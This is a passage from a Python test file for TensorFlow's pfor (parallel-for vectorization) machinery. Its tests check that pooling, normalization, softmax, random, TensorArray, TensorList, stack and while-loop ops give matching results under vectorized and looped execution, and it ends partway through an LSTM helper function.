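    # The tape is persistent and re-entered inside loop_fn (`with g:`) so that
    # a gradient can be computed separately for each pfor iteration.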
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.avg_pool(
x1,
ksize,
strides=[1, 2, 2, 1],
padding="VALID",
data_format="NHWC")
loss = nn.l2_loss(output)
return output, g.gradient(loss, x1)
self._test_loop_fn(loop_fn, 3)
def test_avg_pool3d(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([5, 3, 7, 6, 6, 5])
g.watch(x)
ksize = [1, 2, 2, 2, 1]
strides = [1, 2, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.avg_pool3d(
x1, ksize, strides=strides, padding="VALID", data_format="NDHWC")
loss = nn.l2_loss(output)
return output, g.gradient(loss, x1)
self._test_loop_fn(loop_fn, 3)
def test_max_pool(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 3, 3, 1]
strides = [1, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.max_pool(
x1, ksize, strides=strides, padding="VALID", data_format="NHWC")
loss = nn.l2_loss(output)
ones = array_ops.ones_like(output)
g.watch(ones)
grad = g.gradient(loss, x1, output_gradients=ones)
grad_grad = g.gradient(grad, ones)
return output, grad, grad_grad
self._test_loop_fn(loop_fn, 3)
def test_max_pool_v2(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 3, 3, 1]
strides = [1, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = gen_nn_ops.max_pool_v2(
x1, ksize, strides=strides, padding="VALID", data_format="NHWC")
loss = nn.l2_loss(output)
ones = array_ops.ones_like(output)
g.watch(ones)
grad = g.gradient(loss, x1, output_gradients=ones)
grad_grad = g.gradient(grad, ones)
return output, grad, grad_grad
self._test_loop_fn(loop_fn, 3)
def test_max_pool3d(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 1, 3, 3, 1]
strides = [1, 1, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.max_pool3d(
x1, ksize, strides=strides, padding="VALID", data_format="NDHWC")
loss = nn.l2_loss(output)
ones = array_ops.ones_like(output)
g.watch(ones)
grad = g.gradient(loss, x1, output_gradients=ones)
grad_grad = g.gradient(grad, ones)
return output, grad, grad_grad
self._test_loop_fn(loop_fn, 3)
def test_fused_batch_norm(self):
data_formats = ["NHWC"]
if test.is_gpu_available():
data_formats.append("NCHW")
for is_training in (True, False):
for data_format in data_formats:
with backprop.GradientTape(persistent=True) as g:
if data_format == "NCHW":
x = random_ops.random_uniform([3, 1, 2, 5, 5])
else:
x = random_ops.random_uniform([3, 1, 5, 5, 2])
g.watch(x)
scale = random_ops.random_uniform([2])
g.watch(scale)
offset = random_ops.random_uniform([2])
g.watch(offset)
mean = None if is_training else random_ops.random_uniform([2])
variance = None if is_training else random_ops.random_uniform([2])
# pylint: disable=cell-var-from-loop
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
outputs = nn.fused_batch_norm(
x1,
scale,
offset,
mean=mean,
variance=variance,
epsilon=0.01,
data_format=data_format,
is_training=is_training)
outputs = list(outputs)
# We only test the first value of outputs when is_training is
# False. It looks like CPU and GPU have different outputs for
# batch_mean and batch_variance for this case.
if not is_training:
outputs[1] = constant_op.constant(0.)
outputs[2] = constant_op.constant(0.)
loss = nn.l2_loss(outputs[0])
if is_training:
gradients = g.gradient(loss, [x1, scale, offset])
else:
gradients = [constant_op.constant(0.)] * 3
return outputs + gradients
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_log_softmax(self):
logits = random_ops.random_uniform([3, 2, 4])
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
return (nn.log_softmax(logits_i), nn.log_softmax(logits_i, axis=0),
nn.log_softmax(logits_i, axis=-1))
self._test_loop_fn(loop_fn, 3)
def test_softmax(self):
logits = random_ops.random_uniform([3, 2, 4])
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
return (nn.softmax(logits_i), nn.softmax(logits_i, axis=0),
nn.softmax(logits_i, axis=-1))
self._test_loop_fn(loop_fn, 3)
def test_softmax_cross_entropy_with_logits(self):
with backprop.GradientTape(persistent=True) as g:
logits = random_ops.random_uniform([3, 2, 4])
g.watch(logits)
labels = random_ops.random_uniform([3, 2, 4])
labels /= math_ops.reduce_sum(labels, axis=[2], keepdims=True)
def loop_fn(i):
with g:
logits_i = array_ops.gather(logits, i)
labels_i = array_ops.gather(labels, i)
loss = nn.softmax_cross_entropy_with_logits(
labels=labels_i, logits=logits_i)
total_loss = math_ops.reduce_sum(loss)
return loss, g.gradient(total_loss, logits_i)
self._test_loop_fn(loop_fn, 3)
def test_sparse_softmax_cross_entropy_with_logits(self):
logits = random_ops.random_uniform([3, 2, 4])
labels = random_ops.random_uniform(
shape=[3, 2], maxval=4, dtype=dtypes.int32)
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
labels_i = array_ops.gather(labels, i)
loss = nn.sparse_softmax_cross_entropy_with_logits(
labels=labels_i, logits=logits_i)
return loss
self._test_loop_fn(loop_fn, 3)
class RandomTest(PForTestCase):
# The random values generated in the two implementations are not guaranteed to
# match. So we only check the returned shapes.
def run_and_assert_equal(self, targets1, targets2, rtol=1e-4, atol=1e-5):
outputs = self._run_targets(targets1, targets2)
n = len(outputs) // 2
for i in range(n):
self.assertAllEqual(outputs[i].shape, outputs[i + n].shape)
def test_random_uniform(self):
def loop_fn(_):
return random_ops.random_uniform([3])
self._test_loop_fn(loop_fn, 5)
def test_random_uniform_int(self):
def loop_fn(_):
return random_ops.random_uniform([3], maxval=1, dtype=dtypes.int32)
self._test_loop_fn(loop_fn, 5)
def test_random_standard_normal(self):
def loop_fn(_):
return random_ops.random_normal([3])
self._test_loop_fn(loop_fn, 5)
def test_truncated_normal(self):
def loop_fn(_):
return random_ops.truncated_normal([3])
self._test_loop_fn(loop_fn, 5)
def test_random_gamma_invariant_alpha(self):
def loop_fn(_):
return random_ops.random_gamma([3], alpha=[0.5])
self._test_loop_fn(loop_fn, 5)
def test_random_gamma_varying_alpha(self):
alphas = math_ops.exp(random_ops.random_normal([5, 3, 2]))
def loop_fn(i):
alphas_i = array_ops.gather(alphas, i)
# Test both scalar and non-scalar params and shapes.
return (random_ops.random_gamma(alpha=alphas_i[0, 0], shape=[]),
random_ops.random_gamma(alpha=alphas_i, shape=[]),
random_ops.random_gamma(alpha=alphas_i[0, 0], shape=[3]),
random_ops.random_gamma(alpha=alphas_i, shape=[3]))
self._test_loop_fn(loop_fn, 5)
def test_random_poisson_v2_invariant_rate(self):
def loop_fn(_):
return random_ops.random_poisson(lam=[1.3], shape=[3])
self._test_loop_fn(loop_fn, 5)
def test_random_poisson_v2_varying_rate(self):
rates = math_ops.exp(random_ops.random_normal([5, 3, 2]))
def loop_fn(i):
rates_i = array_ops.gather(rates, i)
# Test both scalar and non-scalar params and shapes.
return (random_ops.random_poisson(lam=rates_i[0, 0], shape=[]),
random_ops.random_poisson(lam=rates_i, shape=[]),
random_ops.random_poisson(lam=rates_i[0, 0], shape=[3]),
random_ops.random_poisson(lam=rates_i, shape=[3]))
self._test_loop_fn(loop_fn, 5)
def test_random_multinomial_invariant_logits(self):
def loop_fn(_):
return random_ops.categorical(logits=[[1., -1.]], num_samples=3)
self._test_loop_fn(loop_fn, 5)
def test_random_multinomial_varying_logits(self):
logits = random_ops.random_normal([5, 3, 2])
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
return random_ops.categorical(logits_i, num_samples=3)
self._test_loop_fn(loop_fn, 5)
class StatelessRandomTest(PForTestCase):
# This test currently only tests that the vectorized and non-vectorized
  # outputs have the same shapes. This is needed since under XLA compilation,
  # stateless random ops can generate different random numbers.
# TODO(agarwal): switch to checking for actual values matching once
# b/149402339 is resolved.
def run_and_assert_equal(self, targets1, targets2, rtol=1e-4, atol=1e-5):
outputs = self._run_targets(targets1, targets2)
n = len(outputs) // 2
for i in range(n):
self.assertAllEqual(outputs[i].shape, outputs[i + n].shape)
# TODO(agarwal): add tests for other random functions
def test_multinomial(self):
seeds = [[1, 2], [3, 4]]
logits = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
logits_0 = array_ops.gather(logits, 0)
logits_i = array_ops.gather(logits, i)
seeds_0 = array_ops.gather(seeds, 0)
seeds_i = array_ops.gather(seeds, i)
return (stateless_random_ops.stateless_categorical(
logits=logits_i, num_samples=3, seed=seeds_i),
stateless_random_ops.stateless_categorical(
logits=logits_i, num_samples=3, seed=seeds_0),
stateless_random_ops.stateless_categorical(
logits=logits_0, num_samples=3, seed=seeds_i),
stateless_random_ops.stateless_categorical(
logits=logits_0, num_samples=3, seed=seeds_0))
self._test_loop_fn(loop_fn, 2)
class LoggingTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_print(self):
x = random_ops.random_uniform([3, 5])
def loop_fn(i):
x1 = array_ops.gather(x, i)
return logging_ops.Print(
x1, [x1, "x1", array_ops.shape(x1)], summarize=10)
self._test_loop_fn(loop_fn, 3)
def test_assert(self):
def loop_fn(i):
return control_flow_ops.Assert(i < 10, [i, [10], [i + 1]])
# TODO(agarwal): make this work with for_loop.
with session.Session() as sess:
sess.run(pfor_control_flow_ops.pfor(loop_fn, 3))
class TensorArrayTest(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.disable_control_flow_v2()
super(TensorArrayTest, self).setUp()
def tearDown(self):
if self._enabled:
control_flow_v2_toggles.enable_control_flow_v2()
super(TensorArrayTest, self).tearDown()
@test_util.run_v1_only("b/122612051")
def test_create_outside_and_read(self):
ta = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 0).write(1, 1)
def loop_fn(i):
return ta.read(i), ta.read(0)
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_create_outside_and_gather(self):
ta = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 0).write(1, 1)
def loop_fn(i):
return ta.gather([i]), ta.gather([0, 1])
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_create_outside_and_write_and_scatter(self):
t = tensor_array_ops.TensorArray(dtypes.int32, 10, clear_after_read=False)
handle = t.handle
def loop_fn(i):
ta = t.write(i + 2, 2 * i).write(i, 5)
ta = ta.scatter([4 + i], [4]).scatter([6 + i, 8 + i], [6 + i, 8 + i])
return ta.flow
t1 = pfor_control_flow_ops.pfor(loop_fn, iters=2)
out1 = tensor_array_ops.TensorArray(
dtypes.int32, handle=handle, flow=t1[-1]).stack()
output1 = self._run_targets(out1)
t2 = pfor_control_flow_ops.for_loop(loop_fn, dtypes.float32, iters=2)
out2 = tensor_array_ops.TensorArray(
dtypes.int32, handle=handle, flow=t2[-1]).stack()
output2 = self._run_targets(out2)
self.assertAllClose(output2, output1)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_write(self):
def loop_fn(i):
# TODO(agarwal): switching the order of writes to ta1 does not work.
ta1 = tensor_array_ops.TensorArray(dtypes.int32, 2).write(0,
i).write(1, 1)
ta2 = tensor_array_ops.TensorArray(dtypes.int32, 1).write(0, 1)
return ta1.stack(), ta2.stack()
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_scatter(self):
def loop_fn(i):
# TODO(agarwal): switching the order of scatter to ta1 does not work.
ta1 = tensor_array_ops.TensorArray(dtypes.int32,
2).scatter([0],
[[i, 2]]).scatter([1],
[[1, 2]])
ta2 = tensor_array_ops.TensorArray(dtypes.int32,
2).scatter([0], [3]).scatter([1], [4])
return ta1.stack(), ta2.stack()
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_read(self):
def loop_fn(i):
ta1 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, i).write(1, 1)
ta2 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 1).write(1, 2)
# TODO(agarwal): ta1.read(i) currently is not supported.
return ta1.read(0), ta2.read(0), ta2.read(i)
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_gather(self):
def loop_fn(i):
ta1 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, i).write(1, 1)
ta2 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 1).write(1, 2)
# TODO(agarwal): ta1.read(i) currently is not supported.
return ta1.gather([0, 1]), ta2.gather([0, 1]), ta2.gather([i])
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_grad(self):
x = random_ops.random_uniform([3, 2])
ta = tensor_array_ops.TensorArray(
dtypes.float32, 3, clear_after_read=False).unstack(x)
y = math_ops.square(ta.stack())
def loop_fn(i):
y_i = array_ops.gather(y, i)
grad = gradient_ops.gradients(y_i, x)[0]
return array_ops.gather(grad, i)
t1 = pfor_control_flow_ops.pfor(loop_fn, iters=3)
# y = x * x. Hence dy/dx = 2 * x.
    expected_grad = 2.0 * x
    with session.Session() as sess:
      computed_grad, expected_grad = sess.run([t1, expected_grad])
      self.assertAllClose(expected_grad, computed_grad)
@test_util.run_all_in_graph_and_eager_modes
class TensorListTest(PForTestCase):
def test_create_outside_and_write(self):
handle1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
handle2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
def loop_fn(i):
h1 = list_ops.tensor_list_set_item(handle1, 0, i)
h1 = list_ops.tensor_list_set_item(h1, 1, 1)
h2 = list_ops.tensor_list_set_item(handle2, 0, 1)
return (list_ops.tensor_list_stack(h1, dtypes.int32),
list_ops.tensor_list_stack(h2, dtypes.int32))
self._test_loop_fn(loop_fn, 3)
def test_create_inside_and_write(self):
def loop_fn(i):
h1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
h1 = list_ops.tensor_list_set_item(h1, 0, i)
h1 = list_ops.tensor_list_set_item(h1, 1, 1)
h2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
h2 = list_ops.tensor_list_set_item(h2, 0, 1)
return (list_ops.tensor_list_stack(h1, dtypes.int32),
list_ops.tensor_list_stack(h2, dtypes.int32))
self._test_loop_fn(loop_fn, 3)
def test_create_outside_and_read(self):
handle = list_ops.tensor_list_reserve([], 2, dtypes.int32)
handle = list_ops.tensor_list_set_item(handle, 0, 0)
handle = list_ops.tensor_list_set_item(handle, 1, 1)
def loop_fn(i):
return (list_ops.tensor_list_get_item(handle, i, dtypes.int32),
list_ops.tensor_list_get_item(handle, 0, dtypes.int32),
list_ops.tensor_list_length(handle),
list_ops.tensor_list_element_shape(handle, dtypes.int32),
list_ops.tensor_list_element_shape(handle, dtypes.int64))
self._test_loop_fn(loop_fn, 2)
def test_create_inside_and_read(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([], 2, dtypes.int32)
handle = list_ops.tensor_list_set_item(handle, 0, i)
handle = list_ops.tensor_list_set_item(handle, 1, 1)
return (list_ops.tensor_list_get_item(handle, 0, dtypes.int32),
list_ops.tensor_list_get_item(handle, i, dtypes.int32),
list_ops.tensor_list_length(handle),
list_ops.tensor_list_element_shape(handle, dtypes.int32),
list_ops.tensor_list_element_shape(handle, dtypes.int64))
self._test_loop_fn(loop_fn, 2)
def test_create_outside_and_scatter(self):
h = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
def loop_fn(i):
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=h)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return list_ops.tensor_list_stack(handle, dtypes.int32)
self._test_loop_fn(loop_fn, 3)
def test_create_inside_and_scatter(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return list_ops.tensor_list_stack(handle, dtypes.int32)
self._test_loop_fn(loop_fn, 3)
def test_create_outside_and_gather(self):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[2, 3]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
def loop_fn(i):
return (list_ops.tensor_list_gather(handle, [0, 1], dtypes.int32),
list_ops.tensor_list_gather(handle, [i], dtypes.int32))
self._test_loop_fn(loop_fn, 2)
def test_create_inside_and_gather(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return (list_ops.tensor_list_gather(handle, [0, 1], dtypes.int32),
list_ops.tensor_list_gather(handle, [i], dtypes.int32))
self._test_loop_fn(loop_fn, 2)
def test_create_inside_and_concat(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return gen_list_ops.tensor_list_concat_v2(
handle,
element_dtype=dtypes.int32,
element_shape=[2],
leading_dims=[])
output = pfor_control_flow_ops.pfor(loop_fn, 2)
self.assertAllClose([[0, 2, 1, 2], [1, 2, 1, 2]], output[0])
self.assertAllClose([[2, 2], [2, 2]], output[1])
def test_create_outside_and_concat(self):
h = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
def loop_fn(i):
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=h)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return gen_list_ops.tensor_list_concat_v2(
handle,
element_dtype=dtypes.int32,
element_shape=[2],
leading_dims=[])
output = pfor_control_flow_ops.pfor(loop_fn, 2)
self.assertAllClose([[0, 2, 1, 2], [1, 2, 1, 2]], output[0])
self.assertAllClose([[2, 2], [2, 2]], output[1])
def test_tensor_list_from_tensor(self):
t = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
handle = list_ops.tensor_list_from_tensor(array_ops.gather(t, i), [4])
return list_ops.tensor_list_stack(handle, t.dtype)
self._test_loop_fn(loop_fn, 2)
def test_tensor_list_reserve_while_loop(self):
# Here a loop invariant TensorList is captured by a while_loop, which then
# performs loop dependent operations on it, resulting in a loop variant
# output. This forces stacking of the variant handle captured by the
# while_loop.
# We handle this particular case by forcing vectorization of
# TensorListReserve operation.
v2_enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.enable_control_flow_v2()
def loop_fn(i):
handle = list_ops.tensor_list_reserve([], 2, dtypes.int32)
_, out_handle = control_flow_ops.while_loop(
lambda j, _: j < 2, lambda j, h:
(j + 1, list_ops.tensor_list_set_item(h, j, i)), (0, handle))
return list_ops.tensor_list_stack(out_handle, dtypes.int32)
self._test_loop_fn(loop_fn, 2)
if not v2_enabled:
control_flow_v2_toggles.disable_control_flow_v2()
def test_tensor_list_addn_already_stacked(self):
def loop_fn(i):
l1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l1 = list_ops.tensor_list_set_item(l1, 0, i)
l2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l2 = list_ops.tensor_list_set_item(l2, 1, i)
return list_ops.tensor_list_stack(math_ops.add_n([l1, l2]), dtypes.int32)
self._test_loop_fn(loop_fn, 2)
def test_tensor_list_addn_stacking_required(self):
l1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l1 = list_ops.tensor_list_set_item(l1, 1, 1)
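    # l1 is created outside the loop and is loop-invariant, while l2 below
    # depends on i, so add_n requires l1 to be stacked to match l2.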
def loop_fn(i):
l2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l2 = list_ops.tensor_list_set_item(l2, 1, i)
return list_ops.tensor_list_stack(
math_ops.add_n([l1, l2]), dtypes.int32)
self._test_loop_fn(loop_fn, 2)
class StackTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_stack_inside_loop_invariant(self):
def loop_fn(_):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
op1 = data_flow_ops.stack_push_v2(s, 1)
with ops.control_dependencies([op1]):
op2 = data_flow_ops.stack_push_v2(s, 2)
with ops.control_dependencies([op2]):
e2 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
with ops.control_dependencies([e2]):
e1 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
return e1, e2
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_stack_inside_push_loop_dependent(self):
def loop_fn(i):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
op1 = data_flow_ops.stack_push_v2(s, i)
with ops.control_dependencies([op1]):
op2 = data_flow_ops.stack_push_v2(s, 2)
with ops.control_dependencies([op2]):
e2 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
with ops.control_dependencies([e2]):
e1 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
return e1, e2
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_stack_outside_pop(self):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
op = data_flow_ops.stack_push_v2(s, 5)
with ops.control_dependencies([op]):
op = data_flow_ops.stack_push_v2(s, 6)
with ops.control_dependencies([op]):
op = data_flow_ops.stack_push_v2(s, 7)
def loop_fn(_):
e1 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
with ops.control_dependencies([e1]):
e2 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
return e1, e2
with ops.control_dependencies([op]):
e1, e2 = pfor_control_flow_ops.pfor(loop_fn, iters=2)
with ops.control_dependencies([e1, e2]):
e3 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
v1, v2, v3 = self._run_targets([e1, e2, e3], run_init=False)
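    # Every pfor iteration observes the same pop sequence (7 then 6); the pop
    # issued after the loop then sees 5 on top of the stack.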
self.assertAllEqual([7, 7], v1)
self.assertAllEqual([6, 6], v2)
self.assertAllEqual(5, v3)
@test_util.run_v1_only("b/122612051")
def test_stack_outside_push(self):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
def loop_fn(_):
return data_flow_ops.stack_push_v2(s, 7)
with self.assertRaisesRegex(ValueError, "StackPushV2 not allowed.*"):
pfor_control_flow_ops.pfor(loop_fn, iters=2)
# TODO(agarwal): test nested while_loops. This currently requires converting a
# tf.cond.
class WhileV1Test(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.disable_control_flow_v2()
super(WhileV1Test, self).setUp()
def tearDown(self):
if self._enabled:
control_flow_v2_toggles.enable_control_flow_v2()
super(WhileV1Test, self).tearDown()
def test_while_outside_loop(self):
x = control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
def loop_fn(i):
return x + i
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_invariant_while(self):
def loop_fn(_):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_invariant_while_with_control_dependency(self):
def loop_fn(i):
with ops.control_dependencies([i]):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1,
[0])
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while_with_stateful_ops(self):
def loop_fn(_):
return control_flow_ops.while_loop(
lambda j, x: j < 4, lambda j, x:
(j + 1, x + random_ops.random_uniform([])), [0, 0.])[0]
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while_unstacked_condition(self):
def loop_fn(i):
return control_flow_ops.while_loop(lambda j, x: j < 4, lambda j, x:
(j + 1, x + i), [0, 0])
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while(self):
x = random_ops.random_uniform([3, 5])
lengths = constant_op.constant([4, 0, 2])
def loop_fn(i):
x_i = array_ops.gather(x, i)
lengths_i = array_ops.gather(lengths, i)
_, total = control_flow_ops.while_loop(
lambda j, _: j < lengths_i, lambda j, t:
(j + 1, t + array_ops.gather(x_i, j)), [0, 0.])
return total
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while_jacobian(self):
x = random_ops.random_uniform([1, 3])
y = random_ops.random_uniform([3, 3])
# out = x @ y @ y @ y @ y, where @ is matmul operator.
_, out = control_flow_ops.while_loop(
lambda i, _: i < 4, lambda i, out: (i + 1, math_ops.matmul(out, y)),
[0, x])
def loop_fn(i):
out_i = array_ops.gather(out, i, axis=1)
return array_ops.reshape(gradient_ops.gradients(out_i, x)[0], [-1])
out = pfor_control_flow_ops.pfor(loop_fn, iters=3)
# The above code does not work with tf.while_loop instead of pfor. So we
# manually compute the expected output here.
    # Note that the gradient of the output w.r.t. x is (y @ y @ y @ y)^T.
expected_output = y
for _ in range(3):
expected_output = math_ops.matmul(expected_output, y)
expected_output = array_ops.transpose(expected_output, [1, 0])
with session.Session() as sess:
out, expected = sess.run([out, expected_output])
self.assertAllClose(expected, out)
@test_util.run_v1_only("b/122612051")
def test_tensor_array_as_loop_variable(self):
def loop_fn(i):
def body(j, ta):
ta = ta.write(j, i + j * j)
return j + 1, ta
_, ta = control_flow_ops.while_loop(
lambda j, _: j < 4, body,
(0, tensor_array_ops.TensorArray(dtypes.int32, size=4)))
return ta.stack()
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_read_tensor_array_partitioned_indices(self):
# Note that tensor array values are pfor loop dependent, and the while loop
# termination condition is also dependent on pfor iteration.
def loop_fn(i):
ta = tensor_array_ops.TensorArray(dtypes.int32, size=6)
ta = ta.unstack(i + list(range(5)))
def body(j, s):
return j + 1, s + ta.read(j)
_, s = control_flow_ops.while_loop(lambda j, _: j < i, body, (0, 0))
return s
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_external_while_loop_grad(self):
# Here we test that external while_loops that are extended from inside pfor
    # (due to gradient calls) are not actually converted. If the below were
    # converted, all pfor iterations would write to the same tensor array
    # indices.
x = constant_op.constant(1.)
def body(j, ta):
ta = ta.write(j, x)
return j + 1, ta
_, ta = control_flow_ops.while_loop(
lambda j, _: j < 4, body,
(0, tensor_array_ops.TensorArray(dtypes.float32, size=4)))
out = ta.stack()
def loop_fn(i):
out_i = array_ops.gather(out, i)
return gradient_ops.gradients(out_i, x)[0]
with session.Session() as sess:
# out is [x, x, x]. Hence the gradients should be [1, 1, 1].
self.assertAllEqual([1, 1, 1],
sess.run(pfor_control_flow_ops.pfor(loop_fn, 3)))
@test_util.run_v1_only("b/122612051")
def test_tensor_array_grad(self):
inp = constant_op.constant(np.random.rand(3, 4, 2), dtype=dtypes.float32)
ta = tensor_array_ops.TensorArray(dtypes.float32, size=3)
ta = ta.unstack(inp)
def loop_fn(i):
def body(j, x):
value = ta.gather([j])
value = array_ops.gather(array_ops.reshape(value, [4, 2]), i)
return j + 1, x + value
_, out = control_flow_ops.while_loop(lambda j, _: j < 3, body,
(0, array_ops.zeros([2])))
out = math_ops.reduce_prod(out)
return out, gradient_ops.gradients(out, inp)[0]
pfor_out, pfor_out_grad = pfor_control_flow_ops.pfor(loop_fn, 4)
# Note that tf.while_loop does not work in the setup above. So we manually
# construct the equivalent computation of the above loops here.
real_out = math_ops.reduce_sum(inp, axis=[0])
real_out = math_ops.reduce_prod(real_out, axis=[1])
# Note that gradients of real_out will accumulate the gradients across the
# output value. Hence we do the same aggregation on pfor_out_grad.
real_out_grad = gradient_ops.gradients(real_out, inp)[0]
sum_pfor_out_grad = math_ops.reduce_sum(pfor_out_grad, axis=[0])
with session.Session() as sess:
v1, v2, v1_grad, v2_grad = sess.run(
[pfor_out, real_out, sum_pfor_out_grad, real_out_grad])
self.assertAllClose(v1, v2)
self.assertAllClose(v1_grad, v2_grad)
def dynamic_lstm_input_fn(batch_size, state_size, max_steps):
# We make inputs and sequence_length constant so that multiple session.run
# calls produce the same result.
inputs = constant_op.constant(
np.random.rand(batch_size, max_steps, state_size), dtype=dtypes.float32)
sequence_length = np.random.randint(0, size=[batch_size], high=max_steps + 1)
sequence_length = constant_op.constant(sequence_length, dtype=dtypes.int32)
return inputs, sequence_length
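# Builds the same recurrence two ways: by stepping `cell` inside a pfor loop
# (one iteration per batch element) and via rnn.dynamic_rnn, so callers can
# compare or benchmark the two outputs.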
def create_dynamic_lstm(cell_fn, batch_size, state_size, max_steps):
cell = cell_fn(state_size)
inputs, sequence_length = dynamic_lstm_input_fn(batch_size, state_size,
max_steps)
inputs_ta = tensor_array_ops.TensorArray(
dtypes.float32, size=max_steps, element_shape=[batch_size, state_size])
inputs_time_major = array_ops.transpose(inputs, [1, 0, 2])
inputs_ta = inputs_ta.unstack(inputs_time_major)
zeros = array_ops.zeros([state_size])
def loop_fn(i):
sequence_length_i = array_ops.gather(sequence_length, i)
def body_fn(t, state, ta):
inputs_t = array_ops.expand_dims(
array_ops.gather(inputs_ta.read(t), i), 0)
output, new_state = cell(inputs_t, state)
output = array_ops.reshape(output, [-1])
